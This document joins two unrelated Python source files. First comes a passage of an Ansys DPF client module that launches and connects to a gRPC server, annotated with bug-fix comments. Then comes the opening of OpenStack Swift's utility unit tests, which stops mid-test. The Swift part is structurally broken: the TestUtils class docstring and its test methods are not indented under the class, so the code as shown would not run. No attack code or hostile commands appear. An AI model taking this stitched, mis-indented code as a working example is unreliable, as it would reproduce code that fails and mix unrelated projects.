        # BUGFIX: the middle line previously lacked the f-prefix, so the
        # literal text "{ansys_path}" was shown instead of the path.
        raise OSError(f'Unable to launch the server after {n_attempts} attempts. '
                      f'Check the following path:\n{ansys_path}\n\n'
                      'or attempt to use a different port')

    dpf.core._server_instances.append(weakref.ref(server))
    return server
def connect_to_server(ip=LOCALHOST, port=DPF_DEFAULT_PORT, as_global=True, timeout=5):
    """Connect to an existing DPF server.

    This method sets the global default channel that is then used for the
    duration of the DPF session.

    Parameters
    ----------
    ip : str
        IP address of the remote or local instance to connect to. The
        default is ``"LOCALHOST"``.
    port : int
        Port to connect to the remote instance on. The default is
        ``"DPF_DEFAULT_PORT"``, which is 50054.
    as_global : bool, optional
        Global variable that stores the IP address and port for the DPF
        module. All DPF objects created in this Python session will
        use this IP and port. The default is ``True``.
    timeout : float, optional
        Maximum number of seconds for the initialization attempt.
        The default is ``5``. Once the specified number of seconds
        passes, the connection fails.

    Examples
    --------
    >>> from ansys.dpf import core as dpf

    Create a server.

    >>> #server = dpf.start_local_server(ip = '127.0.0.1')
    >>> #port = server.port

    Connect to a remote server at a non-default port.

    >>> #specified_server = dpf.connect_to_server('127.0.0.1', port, as_global=False)

    Connect to the localhost at the default port.

    >>> #unspecified_server = dpf.connect_to_server(as_global=False)
    """
    # BUGFIX: forward ``timeout`` to DpfServer; it was previously accepted
    # but silently ignored, so the documented timeout had no effect.
    server = DpfServer(ip=ip, port=port, as_global=as_global,
                       launch_server=False, timeout=timeout)
    dpf.core._server_instances.append(weakref.ref(server))
    return server
class DpfServer:
    """Provides an instance of the DPF server.

    Parameters
    -----------
    ansys_path : str
        Root path of the Ansys installation (used to locate the DPF
        executable when launching).
    ip : str
        IP address of the remote or local instance to connect to. The
        default is ``"LOCALHOST"``.
    port : int
        Port to connect to the remote instance on. The default is
        ``"DPF_DEFAULT_PORT"``, which is 50054.
    timeout : float, optional
        Maximum number of seconds for the initialization attempt.
        The default is ``10``. Once the specified number of seconds
        passes, the connection fails.
    as_global : bool, optional
        Global variable that stores the IP address and port for the DPF
        module. All DPF objects created in this Python session will
        use this IP and port. The default is ``True``.
    load_operators : bool, optional
        Whether to automatically load the math operators. The default
        is ``True``.
    launch_server : bool, optional
        Whether to launch the server on Windows.
    """

    def __init__(self, ansys_path="", ip=LOCALHOST, port=DPF_DEFAULT_PORT,
                 timeout=10, as_global=True, load_operators=True, launch_server=True):
        """Start the DPF server."""
        # check valid ip and port
        check_valid_ip(ip)
        if not isinstance(port, int):
            raise ValueError('Port must be an integer')

        if os.name == 'posix' and 'ubuntu' in platform.platform().lower():
            raise OSError('DPF does not support Ubuntu')
        elif launch_server:
            launch_dpf(ansys_path, ip, port)

        self.channel = grpc.insecure_channel('%s:%d' % (ip, port))

        # When connecting to an already-running server, wait until the gRPC
        # channel has matured (relies on the private ``_matured`` flag of
        # the grpc future -- NOTE(review): confirm against installed grpc).
        if launch_server is False:
            state = grpc.channel_ready_future(self.channel)
            tstart = time.time()
            while ((time.time() - tstart) < timeout) and not state._matured:
                time.sleep(0.01)
            if not state._matured:
                raise TimeoutError(f'Failed to connect to {ip}:{port} in {timeout} seconds')
            LOG.debug('Established connection to DPF gRPC')

        # assign to global channel when requested
        if as_global:
            dpf.core.SERVER = self

        # TODO: add to PIDs ...

        # store port and ip for later reference
        self.live = True
        self.ansys_path = ansys_path
        self._input_ip = ip
        self._input_port = port
        self._own_process = launch_server

    @property
    def _base_service(self):
        # Lazily build and cache the BaseService.  BUGFIX: the hasattr()
        # check must use the name-mangled attribute name produced by the
        # ``self.__base_service`` assignment ("_DpfServer__base_service");
        # checking the literal "__base_service" never matched, so a new
        # BaseService was silently created on every access.
        if not hasattr(self, "_DpfServer__base_service"):
            from ansys.dpf.core.core import BaseService
            self.__base_service = BaseService(self, timeout=1)
        return self.__base_service

    @property
    def info(self):
        """Server information.

        Returns
        -------
        info : dictionary
            Dictionary with server information, including ``"server_ip"``,
            ``"server_port"``, ``"server_process_id"``, and
            ``"server_version"`` keys.
        """
        return self._base_service.server_info

    @property
    def ip(self):
        """IP address of the server (empty string when it cannot be queried).

        Returns
        -------
        ip : str
        """
        try:
            return self._base_service.server_info["server_ip"]
        except Exception:
            return ""

    @property
    def port(self):
        """Port of the server (0 when it cannot be queried).

        Returns
        -------
        port : int
        """
        try:
            return self._base_service.server_info["server_port"]
        except Exception:
            return 0

    @property
    def version(self):
        """Version of the server.

        Returns
        -------
        version : str
        """
        return self._base_service.server_info["server_version"]

    def __str__(self):
        return f'DPF Server: {self.info}'

    def shutdown(self):
        """Kill the owned server process and detach this instance from the
        module-level registries (best effort)."""
        if self._own_process and self.live and self._base_service:
            self._base_service._prepare_shutdown()
            p = psutil.Process(self._base_service.server_info["server_process_id"])
            p.kill()
            time.sleep(0.1)
            self.live = False
            try:
                if id(dpf.core.SERVER) == id(self):
                    dpf.core.SERVER = None
            except Exception:
                pass

            try:
                # Iterate over a copy: removing entries from the list being
                # iterated would skip elements.
                for server in list(dpf.core._server_instances):
                    if server() == self:
                        dpf.core._server_instances.remove(server)
            except Exception:
                pass

    def __eq__(self, other_server):
        """Return True when both the IP and the port are equal."""
        if isinstance(other_server, DpfServer):
            return self.ip == other_server.ip and self.port == other_server.port
        return False

    def __ne__(self, other_server):
        """Return True when the IP or the port differ."""
        return not self.__eq__(other_server)

    def __del__(self):
        try:
            self.shutdown()
        except Exception:
            pass

    def check_version(self, required_version, msg=None):
        """Check if the server version matches with a required version.

        Parameters
        ----------
        required_version : str
            Required version to compare with the server version.
        msg : str, optional
            Message for the raised exception if version requirements do not match.

        Raises
        ------
        dpf_errors : errors
            errors.DpfVersionNotSupported is raised if failure.

        Returns
        -------
        bool
            ``True`` if the server version meets the requirement.
        """
        from ansys.dpf.core.check_version import server_meet_version_and_raise
        return server_meet_version_and_raise(required_version, self, msg)
def launch_dpf(ansys_path, ip=LOCALHOST, port=DPF_DEFAULT_PORT, timeout=10):
    """Launch Ansys DPF.

    Parameters
    ----------
    ansys_path : str, optional
        Root path for the Ansys installation directory. For example, ``"/ansys_inc/v212/"``.
        The default is the latest Ansys installation.
    ip : str, optional
        IP address of the remote or local instance to connect to. The
        default is ``"LOCALHOST"``.
    port : int
        Port to connect to the remote instance on. The default is
        ``"DPF_DEFAULT_PORT"``, which is 50054.
    timeout : float, optional
        Maximum number of seconds for the initialization attempt.
        The default is ``10``. Once the specified number of seconds
        passes, the connection fails.

    Returns
    -------
    process : subprocess.Popen
        DPF Process.
    """
    if os.name == 'nt':
        run_cmd = f'Ans.Dpf.Grpc.bat --address {ip} --port {port}'
        path_in_install = "aisol/bin/winx64"
    else:
        run_cmd = ['./Ans.Dpf.Grpc.sh', f'--address {ip}', f'--port {port}']
        path_in_install = "aisol/bin/linx64"

    # verify ansys path is valid
    if os.path.isdir(f'{ansys_path}/{path_in_install}'):
        dpf_run_dir = f'{ansys_path}/{path_in_install}'
    else:
        dpf_run_dir = f'{ansys_path}'
    if not os.path.isdir(dpf_run_dir):
        raise NotADirectoryError(f'Invalid ansys path at "{ansys_path}". '
                                 'Unable to locate the directory containing DPF at '
                                 f'"{dpf_run_dir}"')

    old_dir = os.getcwd()
    os.chdir(dpf_run_dir)
    process = subprocess.Popen(run_cmd,
                               stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE)
    os.chdir(old_dir)

    # Collect server output in the background; the pipe readers block, so
    # they must run in daemon threads.
    stdout_lines = []
    def read_stdout():
        for line in io.TextIOWrapper(process.stdout, encoding="utf-8"):
            LOG.debug(line)
            stdout_lines.append(line)

    # BUGFIX: this list was previously named ``errors``, shadowing the
    # ``ansys.dpf.core.errors`` module and turning the InvalidPortError
    # raise below into an AttributeError on a list.
    stderr_lines = []
    def read_stderr():
        for line in io.TextIOWrapper(process.stderr, encoding="utf-8"):
            LOG.error(line)
            stderr_lines.append(line)

    Thread(target=read_stdout, daemon=True).start()
    Thread(target=read_stderr, daemon=True).start()

    # Wait for the "server started" banner, up to ``timeout`` seconds.
    t_timeout = time.time() + timeout
    started = False
    while not started:
        started = any('server started' in line for line in stdout_lines)
        if time.time() > t_timeout:
            raise TimeoutError(f'Server did not start in {timeout} seconds')
        time.sleep(0.005)  # avoid a hot busy-wait while polling

    # verify there were no errors
    time.sleep(1)
    if stderr_lines:
        try:
            process.kill()
        except PermissionError:
            pass
        errstr = '\n'.join(stderr_lines)
        if 'Only one usage of each socket address' in errstr:
            raise errors.InvalidPortError(f'Port {port} in use')
        raise RuntimeError(errstr)

    # Return the process as promised by the docstring (previously None).
    return process
|
test_utils.py | # Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for swift.common.utils"""
from test.unit import temptree
import ctypes
import errno
import eventlet
import eventlet.event
import logging
import os
import random
import re
import socket
import sys
from textwrap import dedent
import tempfile
import threading
import time
import unittest
import fcntl
import shutil
from contextlib import nested
from Queue import Queue, Empty
from getpass import getuser
from shutil import rmtree
from StringIO import StringIO
from functools import partial
from tempfile import TemporaryFile, NamedTemporaryFile, mkdtemp
from netifaces import AF_INET6
from mock import MagicMock, patch
from swift.common.exceptions import (Timeout, MessageTimeout,
ConnectionTimeout, LockTimeout,
ReplicationLockTimeout)
from swift.common import utils
from swift.common.swob import Response
from test.unit import FakeLogger
class MockOs():
    """Partial stand-in for the ``os`` module used by daemonization tests.

    Attribute lookups that are not explicitly mocked fall through to the
    real ``os`` module.

    pass_funcs   -- names that become silent no-ops on this instance
    called_funcs -- names that record the call in ``self.called_funcs``
    raise_funcs  -- names that record the call and then raise ``OSError``
    """

    def __init__(self, pass_funcs=None, called_funcs=None, raise_funcs=None):
        # None defaults instead of mutable [] defaults, which would be
        # shared between every MockOs instance.
        self.closed_fds = []
        for func in (pass_funcs or []):
            setattr(self, func, self.pass_func)
        self.called_funcs = {}
        for func in (called_funcs or []):
            c_func = partial(self.called_func, func)
            setattr(self, func, c_func)
        for func in (raise_funcs or []):
            r_func = partial(self.raise_func, func)
            setattr(self, func, r_func)

    def pass_func(self, *args, **kwargs):
        pass

    # Commonly daemonized calls default to no-ops at class level; they may
    # still be overridden per-instance in __init__.
    setgroups = chdir = setsid = setgid = setuid = umask = pass_func

    def called_func(self, name, *args, **kwargs):
        self.called_funcs[name] = True

    def raise_func(self, name, *args, **kwargs):
        self.called_funcs[name] = True
        raise OSError()

    def dup2(self, source, target):
        # Tests treat an fd that was dup2'd over as "closed".
        self.closed_fds.append(target)

    def geteuid(self):
        '''Pretend we are running as root.'''
        return 0

    def __getattr__(self, name):
        # I only over-ride portions of the os module.  (__getattr__ runs
        # only after normal lookup fails; ``object.__getattr__`` does not
        # exist, so the inner access always raises AttributeError and the
        # fallback to the real os module below is taken.)
        try:
            return object.__getattr__(self, name)
        except AttributeError:
            return getattr(os, name)
class MockUdpSocket():
    """Fake UDP socket that records every payload handed to sendto()."""

    def __init__(self):
        self.sent = []

    def sendto(self, data, target):
        # Record instead of transmitting anything.
        self.sent.append((data, target))

    def close(self):
        pass
class MockSys():
    """Fake ``sys`` whose standard streams are backed by temporary files."""

    def __init__(self):
        self.stdin = TemporaryFile('w')
        self.stdout = TemporaryFile('r')
        self.stderr = TemporaryFile('r')
        self.__stderr__ = self.stderr
        # File descriptors of the three standard streams, in order.
        self.stdio_fds = [stream.fileno() for stream in
                          (self.stdin, self.stdout, self.stderr)]
def reset_loggers():
    """Detach every handler utils.get_logger() attached and drop the memo
    attributes it keeps on itself, so tests start from a clean slate."""
    for attr in ('handler4logger', 'console_handler4logger'):
        mapping = getattr(utils.get_logger, attr, None)
        if mapping is None:
            continue
        for logger, handler in mapping.items():
            # clear per-logger txn/client state along with the handler
            logger.thread_locals = (None, None)
            logger.removeHandler(handler)
        delattr(utils.get_logger, attr)
class TestUtils(unittest.TestCase):
"""Tests for swift.common.utils """
def setUp(self):
    """Pin the hash path prefix/suffix to fixed values so hash-based
    assertions are reproducible."""
    utils.HASH_PATH_SUFFIX = 'endcap'
    utils.HASH_PATH_PREFIX = 'startcap'
def test_lock_path(self):
    """A second lock_path() on an already-locked dir must time out."""
    tmpdir = mkdtemp()
    try:
        with utils.lock_path(tmpdir, 0.1):
            caught = None
            acquired = False
            try:
                with utils.lock_path(tmpdir, 0.1):
                    acquired = True
            except LockTimeout as err:
                caught = err
            # the inner attempt must fail with LockTimeout
            self.assertTrue(caught is not None)
            self.assertFalse(acquired)
    finally:
        shutil.rmtree(tmpdir)
def test_lock_path_class(self):
    """lock_path() with an explicit timeout class raises that class;
    the default call still raises plain LockTimeout."""
    tmpdir = mkdtemp()
    try:
        with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
            exc = None
            exc2 = None
            success = False
            try:
                with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
                    success = True
            except ReplicationLockTimeout as err:
                exc = err
            except LockTimeout as err:
                exc2 = err
            # the replication-specific class was raised, not caught by the
            # later LockTimeout clause
            self.assertTrue(exc is not None)
            self.assertTrue(exc2 is None)
            self.assertTrue(not success)
            exc = None
            exc2 = None
            success = False
            try:
                with utils.lock_path(tmpdir, 0.1):
                    success = True
            except ReplicationLockTimeout as err:
                exc = err
            except LockTimeout as err:
                exc2 = err
            # plain lock_path must not raise the replication-specific class
            self.assertTrue(exc is None)
            self.assertTrue(exc2 is not None)
            self.assertTrue(not success)
    finally:
        shutil.rmtree(tmpdir)
def test_normalize_timestamp(self):
    """normalize_timestamp pads to a 10.5-digit string and accepts both
    strings and numbers; non-numeric input raises ValueError."""
    cases = [
        ('1253327593.48174', "1253327593.48174"),
        (1253327593.48174, "1253327593.48174"),
        ('1253327593.48', "1253327593.48000"),
        (1253327593.48, "1253327593.48000"),
        ('253327593.48', "0253327593.48000"),
        (253327593.48, "0253327593.48000"),
        ('1253327593', "1253327593.00000"),
        (1253327593, "1253327593.00000"),
    ]
    for raw, expected in cases:
        self.assertEquals(utils.normalize_timestamp(raw), expected)
    # junk input is rejected outright
    self.assertRaises(ValueError, utils.normalize_timestamp, '')
    self.assertRaises(ValueError, utils.normalize_timestamp, 'abc')
def test_backwards(self):
    """utils.backward must yield a file's lines in reverse order.

    The fixture lines are sized so that with blocksize=25 every block
    boundary condition is exercised; '<' and '>' mark where the block
    boundaries fall.
    """
    blocksize = 25
    lines = ['123456789x12345678><123456789\n',  # block larger than rest
             '123456789x123>\n',  # block ends just before \n character
             '123423456789\n',
             '123456789x\n',  # block ends at the end of line
             '<123456789x123456789x123\n',
             '<6789x123\n',  # block ends at the beginning of the line
             '6789x1234\n',
             '1234><234\n',  # block ends typically in the middle of line
             '123456789x123456789\n']
    with TemporaryFile('r+w') as f:
        for line in lines:
            f.write(line)
        # walk from the last fixture line backwards as backward() yields
        count = len(lines) - 1
        for line in utils.backward(f, blocksize):
            self.assertEquals(line, lines[count].split('\n')[0])
            count -= 1
    # Empty file case
    with TemporaryFile('r') as f:
        self.assertEquals([], list(utils.backward(f)))
def test_mkdirs(self):
    """mkdirs is idempotent, creates intermediate dirs, and raises
    OSError when a path component is a plain file."""
    root = os.path.join(os.path.dirname(__file__), 'mkdirs')
    try:
        os.unlink(root)
    except Exception:
        pass
    rmtree(root, ignore_errors=1)
    self.assert_(not os.path.exists(root))
    # creating twice must succeed both times
    for _ in (0, 1):
        utils.mkdirs(root)
        self.assert_(os.path.exists(root))
    rmtree(root, ignore_errors=1)
    deep = os.path.join(root, 'one/two/three')
    self.assert_(not os.path.exists(deep))
    # intermediate directories are created, idempotently
    for _ in (0, 1):
        utils.mkdirs(deep)
        self.assert_(os.path.exists(deep))
    rmtree(root, ignore_errors=1)
    # a plain file where a directory is needed must raise OSError
    open(root, 'wb').close()
    self.assert_(not os.path.exists(deep))
    self.assertRaises(OSError, utils.mkdirs, deep)
    os.unlink(root)
def test_split_path(self):
    """Exercise utils.split_path across invalid paths, valid paths, and
    the quoting of unsafe characters in error messages."""
    invalid_calls = [('',), ('/',), ('//',), ('//a',), ('/a/c',),
                     ('//c',), ('/a/c/',), ('/a//',), ('/a', 2),
                     ('/a', 2, 3), ('/a', 2, 3, True),
                     ('/a/c/o/r', 3, 3), ('/a', 5, 4)]
    for args in invalid_calls:
        self.assertRaises(ValueError, utils.split_path, *args)
    valid_calls = [(('/a',), ['a']),
                   (('/a/',), ['a']),
                   (('/a/c', 2), ['a', 'c']),
                   (('/a/c/o', 3), ['a', 'c', 'o']),
                   (('/a/c/o/r', 3, 3, True), ['a', 'c', 'o/r']),
                   (('/a/c', 2, 3, True), ['a', 'c', None]),
                   (('/a/c/', 2), ['a', 'c']),
                   (('/a/c/', 2, 3), ['a', 'c', ''])]
    for args, expected in valid_calls:
        self.assertEquals(utils.split_path(*args), expected)
    # unsafe characters must be quoted in the error message
    for args in (('o\nn e', 2), ('o\nn e', 2, 3, True)):
        try:
            utils.split_path(*args)
        except ValueError as err:
            self.assertEquals(str(err), 'Invalid path: o%0An%20e')
def test_validate_device_partition(self):
    """Only non-empty, slash-free, non-dot device/partition names pass."""
    utils.validate_device_partition('foo', 'bar')
    invalid_pairs = [('', ''), ('', 'foo'), ('foo', ''),
                     ('foo/bar', 'foo'), ('foo', 'foo/bar'),
                     ('.', 'foo'), ('..', 'foo'),
                     ('foo', '.'), ('foo', '..')]
    for device, partition in invalid_pairs:
        self.assertRaises(ValueError,
                          utils.validate_device_partition,
                          device, partition)
    # unsafe characters must be quoted in the error text
    try:
        utils.validate_device_partition('o\nn e', 'foo')
    except ValueError as err:
        self.assertEquals(str(err), 'Invalid device: o%0An%20e')
    try:
        utils.validate_device_partition('foo', 'o\nn e')
    except ValueError as err:
        self.assertEquals(str(err), 'Invalid partition: o%0An%20e')
def test_NullLogger(self):
    """NullLogger must silently discard anything written to it.

    The previous version created a StringIO that was never attached to
    the logger, so its assertion could never fail; assert on the
    write() call itself instead.
    """
    nl = utils.NullLogger()
    # write() accepts output and discards it, returning None
    self.assertEquals(nl.write('test'), None)
def test_LoggerFileObject(self):
    """LoggerFileObject routes stdout/stderr writes into the logger with
    a 'STDOUT:' prefix and refuses every read-style operation."""
    orig_stdout = sys.stdout
    orig_stderr = sys.stderr
    sio = StringIO()
    handler = logging.StreamHandler(sio)
    logger = logging.getLogger()
    logger.addHandler(handler)
    lfo = utils.LoggerFileObject(logger)
    print 'test1'
    self.assertEquals(sio.getvalue(), '')
    sys.stdout = lfo
    print 'test2'
    self.assertEquals(sio.getvalue(), 'STDOUT: test2\n')
    sys.stderr = lfo
    print >> sys.stderr, 'test4'
    self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n')
    sys.stdout = orig_stdout
    # with real stdout restored, prints no longer reach the logger
    print 'test5'
    self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n')
    print >> sys.stderr, 'test6'
    self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
                      'STDOUT: test6\n')
    sys.stderr = orig_stderr
    print 'test8'
    self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
                      'STDOUT: test6\n')
    # writelines() entries are joined into one log line ('#012' = \n)
    lfo.writelines(['a', 'b', 'c'])
    self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
                      'STDOUT: test6\nSTDOUT: a#012b#012c\n')
    # close() is a no-op: writes still get logged afterwards
    lfo.close()
    lfo.write('d')
    self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
                      'STDOUT: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
    lfo.flush()
    self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
                      'STDOUT: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
    # every read-style access must raise
    got_exc = False
    try:
        for line in lfo:
            pass
    except Exception:
        got_exc = True
    self.assert_(got_exc)
    got_exc = False
    try:
        for line in lfo.xreadlines():
            pass
    except Exception:
        got_exc = True
    self.assert_(got_exc)
    self.assertRaises(IOError, lfo.read)
    self.assertRaises(IOError, lfo.read, 1024)
    self.assertRaises(IOError, lfo.readline)
    self.assertRaises(IOError, lfo.readline, 1024)
    lfo.tell()
def test_parse_options(self):
    """parse_options: conf path passthrough, -v flag, and the optional
    once / bare-word extra-args handling."""
    # Get a file that is definitely on disk
    with NamedTemporaryFile() as f:
        conf_file = f.name
        conf, options = utils.parse_options(test_args=[conf_file])
        self.assertEquals(conf, conf_file)
        # assert defaults
        self.assertEquals(options['verbose'], False)
        self.assert_('once' not in options)
        # assert verbose as option
        conf, options = utils.parse_options(test_args=[conf_file, '-v'])
        self.assertEquals(options['verbose'], True)
        # check once option
        conf, options = utils.parse_options(test_args=[conf_file],
                                            once=True)
        self.assertEquals(options['once'], False)
        test_args = [conf_file, '--once']
        conf, options = utils.parse_options(test_args=test_args, once=True)
        self.assertEquals(options['once'], True)
        # check options as arg parsing
        test_args = [conf_file, 'once', 'plugin_name', 'verbose']
        conf, options = utils.parse_options(test_args=test_args, once=True)
        self.assertEquals(options['verbose'], True)
        self.assertEquals(options['once'], True)
        self.assertEquals(options['extra_args'], ['plugin_name'])
def test_parse_options_errors(self):
    """parse_options exits via SystemExit, with a message on stdout, for
    a missing conf argument or a nonexistent conf file."""
    orig_stdout = sys.stdout
    orig_stderr = sys.stderr
    stdo = StringIO()
    stde = StringIO()
    # capture what parse_options prints before exiting
    utils.sys.stdout = stdo
    utils.sys.stderr = stde
    self.assertRaises(SystemExit, utils.parse_options, once=True,
                      test_args=[])
    self.assert_('missing config' in stdo.getvalue())
    # verify conf file must exist, context manager will delete temp file
    with NamedTemporaryFile() as f:
        conf_file = f.name
    self.assertRaises(SystemExit, utils.parse_options, once=True,
                      test_args=[conf_file])
    self.assert_('unable to locate' in stdo.getvalue())
    # reset stdio
    utils.sys.stdout = orig_stdout
    utils.sys.stderr = orig_stderr
def test_get_logger(self):
    """get_logger honours log_level and still exercises log_facility."""
    sio = StringIO()
    logger = logging.getLogger('server')
    logger.addHandler(logging.StreamHandler(sio))
    logger = utils.get_logger(None, 'server', log_route='server')
    logger.warn('test1')
    self.assertEquals(sio.getvalue(), 'test1\n')
    # debug is suppressed at the default level
    logger.debug('test2')
    self.assertEquals(sio.getvalue(), 'test1\n')
    logger = utils.get_logger({'log_level': 'DEBUG'}, 'server',
                              log_route='server')
    logger.debug('test3')
    self.assertEquals(sio.getvalue(), 'test1\ntest3\n')
    # Doesn't really test that the log facility is truly being used all the
    # way to syslog; but exercises the code.
    logger = utils.get_logger({'log_facility': 'LOG_LOCAL3'}, 'server',
                              log_route='server')
    logger.warn('test4')
    self.assertEquals(sio.getvalue(),
                      'test1\ntest3\ntest4\n')
    # make sure debug doesn't log by default
    logger.debug('test5')
    self.assertEquals(sio.getvalue(),
                      'test1\ntest3\ntest4\n')
    # make sure notice lvl logs by default
    logger.notice('test6')
    self.assertEquals(sio.getvalue(),
                      'test1\ntest3\ntest4\ntest6\n')
def test_get_logger_sysloghandler_plumbing(self):
    """Verify exactly which constructor arguments get_logger passes to
    SysLogHandler for each facility / address / UDP configuration."""
    orig_sysloghandler = utils.SysLogHandler
    syslog_handler_args = []
    def syslog_handler_catcher(*args, **kwargs):
        # record constructor args, then delegate to the real handler
        syslog_handler_args.append((args, kwargs))
        return orig_sysloghandler(*args, **kwargs)
    # the catcher must expose the facility constants get_logger reads
    syslog_handler_catcher.LOG_LOCAL0 = orig_sysloghandler.LOG_LOCAL0
    syslog_handler_catcher.LOG_LOCAL3 = orig_sysloghandler.LOG_LOCAL3
    try:
        utils.SysLogHandler = syslog_handler_catcher
        utils.get_logger({
            'log_facility': 'LOG_LOCAL3',
        }, 'server', log_route='server')
        expected_args = [((), {'address': '/dev/log',
                               'facility': orig_sysloghandler.LOG_LOCAL3})]
        if not os.path.exists('/dev/log') or \
                os.path.isfile('/dev/log') or \
                os.path.isdir('/dev/log'):
            # Since socket on OSX is in /var/run/syslog, there will be
            # a fallback to UDP.
            expected_args.append(
                ((), {'facility': orig_sysloghandler.LOG_LOCAL3}))
        self.assertEquals(expected_args, syslog_handler_args)
        syslog_handler_args = []
        utils.get_logger({
            'log_facility': 'LOG_LOCAL3',
            'log_address': '/foo/bar',
        }, 'server', log_route='server')
        self.assertEquals([
            ((), {'address': '/foo/bar',
                  'facility': orig_sysloghandler.LOG_LOCAL3}),
            # Second call is because /foo/bar didn't exist (and wasn't a
            # UNIX domain socket).
            ((), {'facility': orig_sysloghandler.LOG_LOCAL3})],
            syslog_handler_args)
        # Using UDP with default port
        syslog_handler_args = []
        utils.get_logger({
            'log_udp_host': 'syslog.funtimes.com',
        }, 'server', log_route='server')
        self.assertEquals([
            ((), {'address': ('syslog.funtimes.com',
                              logging.handlers.SYSLOG_UDP_PORT),
                  'facility': orig_sysloghandler.LOG_LOCAL0})],
            syslog_handler_args)
        # Using UDP with non-default port
        syslog_handler_args = []
        utils.get_logger({
            'log_udp_host': 'syslog.funtimes.com',
            'log_udp_port': '2123',
        }, 'server', log_route='server')
        self.assertEquals([
            ((), {'address': ('syslog.funtimes.com', 2123),
                  'facility': orig_sysloghandler.LOG_LOCAL0})],
            syslog_handler_args)
    finally:
        utils.SysLogHandler = orig_sysloghandler
def test_clean_logger_exception(self):
    """logger.exception() must summarise well-known errno/timeout errors
    without a traceback, and log a full traceback otherwise."""
    # setup stream logging
    sio = StringIO()
    logger = utils.get_logger(None)
    handler = logging.StreamHandler(sio)
    logger.logger.addHandler(handler)
    def strip_value(sio):
        # return what has been logged so far and clear the buffer
        v = sio.getvalue()
        sio.truncate(0)
        return v
    def log_exception(exc):
        # raise and log the exception the way production code would
        try:
            raise exc
        except (Exception, Timeout):
            logger.exception('blah')
    try:
        # establish base case
        self.assertEquals(strip_value(sio), '')
        logger.info('test')
        self.assertEquals(strip_value(sio), 'test\n')
        self.assertEquals(strip_value(sio), '')
        logger.info('test')
        logger.info('test')
        self.assertEquals(strip_value(sio), 'test\ntest\n')
        self.assertEquals(strip_value(sio), '')
        # test OSError
        for en in (errno.EIO, errno.ENOSPC):
            log_exception(OSError(en, 'my %s error message' % en))
            log_msg = strip_value(sio)
            self.assert_('Traceback' not in log_msg)
            self.assert_('my %s error message' % en in log_msg)
        # unfiltered
        log_exception(OSError())
        self.assert_('Traceback' in strip_value(sio))
        # test socket.error
        log_exception(socket.error(errno.ECONNREFUSED,
                                   'my error message'))
        log_msg = strip_value(sio)
        self.assert_('Traceback' not in log_msg)
        self.assert_('errno.ECONNREFUSED message test' not in log_msg)
        self.assert_('Connection refused' in log_msg)
        log_exception(socket.error(errno.EHOSTUNREACH,
                                   'my error message'))
        log_msg = strip_value(sio)
        self.assert_('Traceback' not in log_msg)
        self.assert_('my error message' not in log_msg)
        self.assert_('Host unreachable' in log_msg)
        log_exception(socket.error(errno.ETIMEDOUT, 'my error message'))
        log_msg = strip_value(sio)
        self.assert_('Traceback' not in log_msg)
        self.assert_('my error message' not in log_msg)
        self.assert_('Connection timeout' in log_msg)
        # unfiltered
        log_exception(socket.error(0, 'my error message'))
        log_msg = strip_value(sio)
        self.assert_('Traceback' in log_msg)
        self.assert_('my error message' in log_msg)
        # test eventlet.Timeout
        connection_timeout = ConnectionTimeout(42, 'my error message')
        log_exception(connection_timeout)
        log_msg = strip_value(sio)
        self.assert_('Traceback' not in log_msg)
        self.assert_('ConnectionTimeout' in log_msg)
        self.assert_('(42s)' in log_msg)
        self.assert_('my error message' not in log_msg)
        connection_timeout.cancel()
        message_timeout = MessageTimeout(42, 'my error message')
        log_exception(message_timeout)
        log_msg = strip_value(sio)
        self.assert_('Traceback' not in log_msg)
        self.assert_('MessageTimeout' in log_msg)
        self.assert_('(42s)' in log_msg)
        self.assert_('my error message' in log_msg)
        message_timeout.cancel()
        # test unhandled
        log_exception(Exception('my error message'))
        log_msg = strip_value(sio)
        self.assert_('Traceback' in log_msg)
        self.assert_('my error message' in log_msg)
    finally:
        logger.logger.removeHandler(handler)
        reset_loggers()
def test_swift_log_formatter(self):
    """SwiftLogFormatter appends txn_id / client_ip to error-level lines
    only when they are not already present in the message, and collapses
    embedded newlines to #012."""
    # setup stream logging
    sio = StringIO()
    logger = utils.get_logger(None)
    handler = logging.StreamHandler(sio)
    handler.setFormatter(utils.SwiftLogFormatter())
    logger.logger.addHandler(handler)
    def strip_value(sio):
        # return what has been logged so far and clear the buffer
        v = sio.getvalue()
        sio.truncate(0)
        return v
    try:
        self.assertFalse(logger.txn_id)
        logger.error('my error message')
        log_msg = strip_value(sio)
        self.assert_('my error message' in log_msg)
        self.assert_('txn' not in log_msg)
        logger.txn_id = '12345'
        logger.error('test')
        log_msg = strip_value(sio)
        self.assert_('txn' in log_msg)
        self.assert_('12345' in log_msg)
        # test no txn on info message
        self.assertEquals(logger.txn_id, '12345')
        logger.info('test')
        log_msg = strip_value(sio)
        self.assert_('txn' not in log_msg)
        self.assert_('12345' not in log_msg)
        # test txn already in message
        self.assertEquals(logger.txn_id, '12345')
        logger.warn('test 12345 test')
        self.assertEquals(strip_value(sio), 'test 12345 test\n')
        # Test multi line collapsing
        logger.error('my\nerror\nmessage')
        log_msg = strip_value(sio)
        self.assert_('my#012error#012message' in log_msg)
        # test client_ip
        self.assertFalse(logger.client_ip)
        logger.error('my error message')
        log_msg = strip_value(sio)
        self.assert_('my error message' in log_msg)
        self.assert_('client_ip' not in log_msg)
        logger.client_ip = '1.2.3.4'
        logger.error('test')
